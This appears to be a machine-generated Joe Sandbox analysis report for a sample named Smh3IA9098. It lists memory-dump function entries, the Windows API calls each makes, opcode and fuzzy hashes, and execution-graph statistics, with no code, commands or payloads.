Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 59c0c18-59c0ca7, SetWindowLongW is called from block 59c0c18-59c0c8a]
APIs
• SetWindowLongW.USER32(?,?,?), ref: 059C0C7D
Memory Dump Source
• Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: 3cf34a1fb91dd447039662b7d0ee71eaef5564ce6e5a58b6c1aee39c094dffe2
• Instruction ID: 1773b2f9202fe83b1c1409ede77565be0c5d205d089bd328fc2188abf837380e
• Opcode Fuzzy Hash: 3cf34a1fb91dd447039662b7d0ee71eaef5564ce6e5a58b6c1aee39c094dffe2
• Instruction Fuzzy Hash: 081100B5800209CFDB10CF9AD588BDEBBF8EB48324F24845AD859B7701C378A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 59c0c20-59c0ca7, SetWindowLongW is called from block 59c0c20-59c0c8a]
APIs
• SetWindowLongW.USER32(?,?,?), ref: 059C0C7D
Memory Dump Source
• Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: 673e7352e63d755ad620288190adf8329dc75bcff39e44753e33363fd24c9083
• Instruction ID: eb717d93c30d152c1a84c8c24267d68bb15f4eacb9e5a5c2f1719908829a6ca1
• Opcode Fuzzy Hash: 673e7352e63d755ad620288190adf8329dc75bcff39e44753e33363fd24c9083
• Instruction Fuzzy Hash: FE11D3B5800209DFDB10DF9AD584BDEBBF8EB48324F14845AD859A7700D374A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; basic blocks span 7db9580-7db9607, PostMessageW is called from block 7db9580-7db95ea]
APIs
• PostMessageW.USER32(?,?,?,?), ref: 07DB95DD
Memory Dump Source
• Source File: 00000000.00000002.292995710.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7db0000_Smh3IA9098.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 3214d31ceefc7b4cf8be47904072b61dc3fa4ad4f20ecd21b3b9424a74f4550d
• Instruction ID: 132be07f9e032657712210471345b3b547c16ba21c5fd205229b5cc740ebc1b6
• Opcode Fuzzy Hash: 3214d31ceefc7b4cf8be47904072b61dc3fa4ad4f20ecd21b3b9424a74f4550d
• Instruction Fuzzy Hash: 6411D3B5800249DFDB20DF9AD884BDEFBF8EB48324F10841AE555A7700D374A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69821a3814c6228ef2c74399339e19f635f159d3695314e74699835c64ed6a37
• Instruction ID: ba4178203d3cc13b562d5a5e5ffe8908cb0268581e88105a245134f5c442eeb7
• Opcode Fuzzy Hash: 69821a3814c6228ef2c74399339e19f635f159d3695314e74699835c64ed6a37
• Instruction Fuzzy Hash: 4A21C1B2504240DFDB16DF58D9C0B26BF66FBC8328F64C569E8050B287C336D456CAA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.292995710.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7db0000_Smh3IA9098.jbxd
Similarity
• API ID:
• String ID: ^$y
• API String ID: 0-1095955094
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Similarity
• API ID:
• String ID: ]
• API String ID: 0-3352871620
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Similarity
• API ID:
• String ID: ]
• API String ID: 0-3352871620
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.292995710.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7db0000_Smh3IA9098.jbxd
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 14.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0.9%
Total number of Nodes: 325
Total number of Limit Nodes: 41
34144->34145 34146 6722ab0 CallWindowProcW 34144->34146 34145->34129 34146->34145 34148 6721084 CallWindowProcW 34147->34148 34149 6722aba 34148->34149 34149->34142 34214 2aa5a10 34215 2aa5a2e 34214->34215 34218 2aa489c 34215->34218 34217 2aa5a65 34220 2aa7530 LoadLibraryA 34218->34220 34221 2aa7629 34220->34221 34150 6770c78 34151 6770c36 34150->34151 34152 6770c73 34151->34152 34155 6771987 34151->34155 34160 6771998 34151->34160 34156 67719ae 34155->34156 34157 6771a5f 34156->34157 34165 67752aa 34156->34165 34170 67752b8 34156->34170 34157->34151 34161 67719ae 34160->34161 34162 6771a5f 34161->34162 34163 67752aa 2 API calls 34161->34163 34164 67752b8 2 API calls 34161->34164 34162->34151 34163->34161 34164->34161 34166 67752d0 34165->34166 34167 6775bbe 34166->34167 34175 6777741 34166->34175 34180 6777750 34166->34180 34167->34156 34171 67752d0 34170->34171 34172 6775bbe 34171->34172 34173 6777741 2 API calls 34171->34173 34174 6777750 2 API calls 34171->34174 34172->34156 34173->34171 34174->34171 34176 6777755 34175->34176 34177 6777783 34176->34177 34185 677c7b0 34176->34185 34190 677c798 34176->34190 34177->34166 34181 6777755 34180->34181 34182 6777783 34181->34182 34183 677c7b0 2 API calls 34181->34183 34184 677c798 2 API calls 34181->34184 34182->34166 34183->34181 34184->34181 34187 677c7c7 34185->34187 34186 677cd26 34186->34176 34187->34186 34188 2aa0b32 2 API calls 34187->34188 34189 2aa0b40 2 API calls 34187->34189 34188->34187 34189->34187 34192 677c7c7 34190->34192 34191 677cd26 34191->34176 34192->34191 34193 2aa0b32 2 API calls 34192->34193 34194 2aa0b40 2 API calls 34192->34194 34193->34192 34194->34192

Control-flow Graph
Legend: • Executed • Not Executed
Function entry 2aaf088 (basic blocks 2aaf088 to 2aaf7c8; rendered graph, edge list omitted). Block 2aaf720-2aaf75b calls GetUserNameW.
APIs
• GetUserNameW.ADVAPI32(00000000,00000000), ref: 02AAF74B
Memory Dump Source
• Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 9f3401dce3e092b1f9fb2027622372c2dad964898f71fca72c8e6198465c4ef0
• Instruction ID: 63ec51390114f7662fe1cc0b524edfcaa6f532bf980eef83987f125e7050a351
• Opcode Fuzzy Hash: 9f3401dce3e092b1f9fb2027622372c2dad964898f71fca72c8e6198465c4ef0
• Instruction Fuzzy Hash: DD513670D00258CFDB18CFA9C89479DBBB1BF48314F14812AE815BB751DBB5A844CF94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Function entry 677cff8 (basic blocks 677cff8 to 677d268; rendered graph, edge list omitted). Calls into 677bf74, 677d270/677d280, 677bf80, 67743a4, 67799f8 and 677bf90; block 677d220-677d24b calls GetModuleHandleW. No API reference line is listed for this function in the report.
Memory Dump Source
• Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 2dfd4693672a6a23c0e8180d8b96fef55bce56d2550cbdee75ff8294d521d9ed
• Instruction ID: 296df99d384b5fc2b55b828bfcfaf59748aea9ab01a951b7a7f9314cceb4856b
• Opcode Fuzzy Hash: 2dfd4693672a6a23c0e8180d8b96fef55bce56d2550cbdee75ff8294d521d9ed
• Instruction Fuzzy Hash: E1712470A10B058FDBA4DF6AD54476ABBF1FF88304F00892AE48AD7A40D775E846CF91
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Function entry 6720007 (basic blocks 6720007 to 67201b1; rendered graph, edge list omitted). Block 6720103-6720162 calls CreateWindowExW.
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06720152
Memory Dump Source
• Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: d7e575d4076c672355778af2ab275a95b716b47bee2a9aa44c8435b9d4751e26
• Instruction ID: 74a1edd181191ad73edeba1905a44d016ab93558a77b511154c62349121b47b5
• Opcode Fuzzy Hash: d7e575d4076c672355778af2ab275a95b716b47bee2a9aa44c8435b9d4751e26
• Instruction Fuzzy Hash: F35124B1C00359DFDB11CFA9C890ADEBFB2BF49310F24816AE404AB211D7B49985CFA1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Function entry 2aaf0a4 (basic blocks 2aaf0a4 to 2aaf7c8; rendered graph, edge list omitted). Block 2aaf720-2aaf75b calls GetUserNameW.
APIs
• GetUserNameW.ADVAPI32(00000000,00000000), ref: 02AAF74B
Memory Dump Source
• Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: e9c25efacf09371bb53cbae941c2dde159594a9a59692795303f4f5d158927f6
• Instruction ID: b19822ef1d08736172b07d66850570247743637db91607b53dafd42f857bf90f
• Opcode Fuzzy Hash: e9c25efacf09371bb53cbae941c2dde159594a9a59692795303f4f5d158927f6
• Instruction Fuzzy Hash: B9512571D00258CFDB18CFA9C8A4B9DBBB1BF48314F14812AE815BB791DBB5A844CF94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Function entry 2aaf605 (basic blocks 2aaf605 to 2aaf7c8; rendered graph, edge list omitted). Block 2aaf720-2aaf75b calls GetUserNameW.
APIs
• GetUserNameW.ADVAPI32(00000000,00000000), ref: 02AAF74B
Memory Dump Source
• Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 26412b753172ddb069da30ca82c6fddc30d6a639d2c31426b2b74b4ffd9abd85
• Instruction ID: 57acbad1c3d2d11625b29427f0b858dc87786172e22a77bb8d72165ba8045a52
• Opcode Fuzzy Hash: 26412b753172ddb069da30ca82c6fddc30d6a639d2c31426b2b74b4ffd9abd85
• Instruction Fuzzy Hash: D1512471D00218CFDB18CFA9C8A579DBBB1BF48314F14812AE819BB790DBB59845CF95
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Function entry 6720040 (basic blocks 6720040 to 67201b1; rendered graph, edge list omitted). Block 67200c3-6720162 calls CreateWindowExW.
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06720152
Memory Dump Source
• Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 5ebe5dd8e8bc8da190107b0325ea321adf376be9ca938f60eb7bd8e680ea9e29
• Instruction ID: da3088ebafbeb26205cc23cfa6b44c1c641c0dcf2f54035e98cf446ef0642947
• Opcode Fuzzy Hash: 5ebe5dd8e8bc8da190107b0325ea321adf376be9ca938f60eb7bd8e680ea9e29
• Instruction Fuzzy Hash: F941BFB1D10359DFDF14CF9AC884ADEBBB5BF48314F24812AE819AB210D7B59985CF90
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Function entry 2aa489c (basic blocks 2aa489c to 2aa7672; rendered graph, edge list omitted). Block 2aa75db-2aa7627 calls LoadLibraryA.
APIs
• LoadLibraryA.KERNELBASE(?), ref: 02AA7617
Memory Dump Source
• Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 4eb36bbb173064b47800106136c66cdd921060d9df05164c8e33f4902f848473
• Instruction ID: 0b7ce128294c6cb36e33725ffc96d8f381266ba0bc341afa519326333e45cf53
• Opcode Fuzzy Hash: 4eb36bbb173064b47800106136c66cdd921060d9df05164c8e33f4902f848473
• Instruction Fuzzy Hash: 264146B0E002598FDB10CFA9D89479EFBF2EF48314F10812AE815A7384DBB49885CF95
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Function entry 6721084 (basic blocks 6721084 to 6722bec; rendered graph, edge list omitted). Block 6722b6a-6722ba2 calls CallWindowProcW.
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 06722B91
Memory Dump Source
• Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: abf0e0e5f1e6e48b5724b592d9bb57005e0b81ddfd6a01ebc99b23c6f6536a46
• Instruction ID: d7e9cc0252880bf9bd858f24b14a1b9dc03d4c62020c50eb78cb8dee9d239efd
• Opcode Fuzzy Hash: abf0e0e5f1e6e48b5724b592d9bb57005e0b81ddfd6a01ebc99b23c6f6536a46
• Instruction Fuzzy Hash: CE413AB4900215CFDB54CF99C488BAABBF6FF88314F258459E529AB321D774E941CFA0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
[graph image, legend Executed / Not Executed; entry block 2aa7524]
APIs
• LoadLibraryA.KERNELBASE(?), ref: 02AA7617
Memory Dump Source
• Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: a81bd3c7f3728d0c5a1ab2d689e49cf4f5674574cc730121e776495c9ac0ec2c
• Instruction ID: 9913862150d1b48b1103527bfd886ba6fcc97d5a9f321abf4fd72d2ad95dab1b
• Opcode Fuzzy Hash: a81bd3c7f3728d0c5a1ab2d689e49cf4f5674574cc730121e776495c9ac0ec2c
• Instruction Fuzzy Hash: 9E4135B0E002598FDB10CFA9D89579EFBF1FF48314F10852AD815A7284DBB89885CF85
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[graph image, legend Executed / Not Executed; entry block 677351c]
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06773B2E,?,?,?,?,?), ref: 06773BEF
Memory Dump Source
• Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 82fe2fea490195aa5b9a08b46c4bf5e7aaca28d68d00c5f93d486b8588797fc1
• Instruction ID: 7c5a6efbe4feaa9ce4f286b13d820434f01d91301615223f492e7b2d0d443ddf
• Opcode Fuzzy Hash: 82fe2fea490195aa5b9a08b46c4bf5e7aaca28d68d00c5f93d486b8588797fc1
• Instruction Fuzzy Hash: CD21F4B5900248DFDB10CF9AD984AEEBBF4EB48320F14841AE914B3310D378A944DFA4
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[graph image, legend Executed / Not Executed; entry block 6773b60]
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06773B2E,?,?,?,?,?), ref: 06773BEF
Memory Dump Source
• Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 1c764ea9e385a13cfc054507fc70843ad34b31de658257531f2ef6f97fe723b4
• Instruction ID: 9cbf61cb631a2089ac111e83b30364b0fed62927a1e63d8eac843f4e7b3bfa76
• Opcode Fuzzy Hash: 1c764ea9e385a13cfc054507fc70843ad34b31de658257531f2ef6f97fe723b4
• Instruction Fuzzy Hash: 7A21E5B5900248EFDB10CF9AD984ADEBFF9EB48320F14841AE914A3310D378A944DFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[graph image, legend Executed / Not Executed; entry block 677bfb8]
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0677D2B9,00000800,00000000,00000000), ref: 0677D4AA
Memory Dump Source
• Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8ad1523a8162278d4db5d22df3afdda4f14ba03554f74d7b099c2a4736319559
• Instruction ID: de2f371eb496e77df68ddb8c569559258c02fe0f11582da86d4d60c57809edf7
• Opcode Fuzzy Hash: 8ad1523a8162278d4db5d22df3afdda4f14ba03554f74d7b099c2a4736319559
• Instruction Fuzzy Hash: E711C4B69002099FDB60CF9AD444BDEBBF5AF88354F14842AE819B7300C379A545CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[graph image, legend Executed / Not Executed; entry block 677d439]
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0677D2B9,00000800,00000000,00000000), ref: 0677D4AA
Memory Dump Source
• Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 85c6930f7cebdc864cbb2765c6c58131db5afc9eacaab2c6f3ef9e57891eec6d
• Instruction ID: fa5e45c96635bb81b6e6b656eaf7f2120c229da097326e7f6f2f16644e81bd5f
• Opcode Fuzzy Hash: 85c6930f7cebdc864cbb2765c6c58131db5afc9eacaab2c6f3ef9e57891eec6d
• Instruction Fuzzy Hash: 4C11C2B6D002499FDB20CF9AD444BEEFBF5AF88314F14842AD819A7710C3B9A545CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[graph image, legend Executed / Not Executed; entry block 677bf74]
APIs
• GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0677D00B), ref: 0677D23E
Memory Dump Source
• Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 96837b745a95c74c857dd9a61071cf5c2c5dbdd32742b233cbdca2a837a3cd55
• Instruction ID: eebe21e0af8a542673b7fbc1008660ad50a504f184b56825575069b9386e46a0
• Opcode Fuzzy Hash: 96837b745a95c74c857dd9a61071cf5c2c5dbdd32742b233cbdca2a837a3cd55
• Instruction Fuzzy Hash: 9A11F0B1D002498FDB20CF9AD544BDEFBF5AF88324F11846AD819B7600D3B8A546CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06727B25
Memory Dump Source
• Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: f9c4c4af0e76c00fd10381a5c1cb958c051683f77e747e1d33de5cfabf33d019
• Instruction ID: 58b542cbeb52c5648f9bb02fecde7fcc946b9c60d6163717a71517dfdb006d18
• Opcode Fuzzy Hash: f9c4c4af0e76c00fd10381a5c1cb958c051683f77e747e1d33de5cfabf33d019
• Instruction Fuzzy Hash: 0F1115B1900249CFCB50DF9AD584BDEBBF4EB48324F108459E519B7700D378A944CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06727B25
Memory Dump Source
• Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 9dcde531a5e91be499c22426386b98e9a49d28014a5c3076e7d5d27a8ba54072
• Instruction ID: d4f309fd1ee3f9c3ea7e7ae5ea7ba7f86b3d8d2bc381b0fb031b65d392e47f3f
• Opcode Fuzzy Hash: 9dcde531a5e91be499c22426386b98e9a49d28014a5c3076e7d5d27a8ba54072
• Instruction Fuzzy Hash: 6D1103B1D00249CFCB60DF9AD584BDEBBF8AB48364F148459E418B3700D378A944CFA5
Uniqueness
Uniqueness Score: -1.00%